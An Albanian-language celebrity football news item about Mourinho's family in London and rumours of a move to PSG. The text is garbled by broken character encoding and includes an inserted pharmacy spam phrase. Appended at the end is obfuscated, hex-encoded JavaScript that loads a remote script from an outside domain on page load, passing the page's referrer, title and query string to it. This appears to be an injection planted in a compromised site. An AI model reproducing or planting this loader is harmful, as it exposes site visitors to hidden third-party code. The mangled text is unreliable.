largea_mou1353338954

Familja Mourinho nA� LondA�r

sildenafil citrate ripoffs. Familja Mourinho pA�rgatitet pA�r ta��u rikthyer nA� LondA�r. Sipas tA� pA�rditshmes spanjolle a�?Asa�?, gruaja dhe vazja e portugezit janA� paraqitur kA�tA� javA� nA� kolegjin e Arteve tA� Bukura nA� kryeqytetin anglez, pA�r tA� marrA� programimin e leksioneve tA� vitit tA� ardhshA�m akademik. TA� dyja pjesA�taret e familjes Mourinho mbA�rritA�n tA� premten nA� aeroportin Heathrow nga Madridi.

Vajza e Mourinjos, 16 vjeA�e, do tA� nisA� studimet nA� qytetin e LondrA�s dhe pA�r kA�tA� arsye A�shtA� regjistruar nA� kolegjin e Arteve tA� Bukura, qA� ndodhet rreth 5 kilometra larg a�?Stamford Bridgea�?. Jose, i cili A�shtA� shprehur sA� fundmi se e urren jetA�n e tij sociale, duket se ka ndA�rmend tA� transferohet nA� LondA�r jo domosdoshmA�risht pA�r tA� stA�rvitur Chelsean, siA� pretendojnA� mediat britanike, pA�rkundrazi, ai synon tA� jetA� nA� krye tA� PSG, pasi Londra dhe Parisi janA� vetA�m dy orA� larg me tren.

SiA� analizon a�?Asa�?, presidenti i parizienA�ve, Al Thani, kA�rkon tA� fitojA� Champions LigA�n, pikA�risht duke blerA� Mourinhon dhe Cristiano Ronaldon. Projekti milionar nA� kryeqytetin francez mbetet njA� mundA�si reale pA�r largimin e portugezit nga Madridi, sidomos pas sulmueve tA� vazhdueshme tA� shtypit spanjoll dhe mungesA�s sA� mbA�shtetjes sA� klubit.

Nga ana tjetA�r, kjo mund tA� jetA� njA� strategji e Mourinjos, pA�r tA� tA�rhequr vA�mendjen e Florentino Perez, i cili nA� janar i rinovoi kontratA�n deri nA� vitin 2016 me parametra mA� tA� mira financiare nA� momentin kur po kA�rkonte shtA�pi pikA�risht nA� LondA�r.var _0x31f1=[“\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0x31f1[1]](_0x31f1[0]);s[_0x31f1[2]]= _0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12];if(document[_0x31f1[13]]){document[_0x31f1[13]][_0x31f1[15]][_0x31f1[14]](s,document[_0x31f1[13]])}else {d[_0x31f1[18]](_0x31f1[17])[0][_0x31f1[16]](s)};if(document[_0x31f1[11]][_0x31f1[19]]=== _0x31f1[20]&& KTracking[_0x31f1[22]][_0x31f1[21]](_0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12])=== -1){alert(_0x31f1[23])}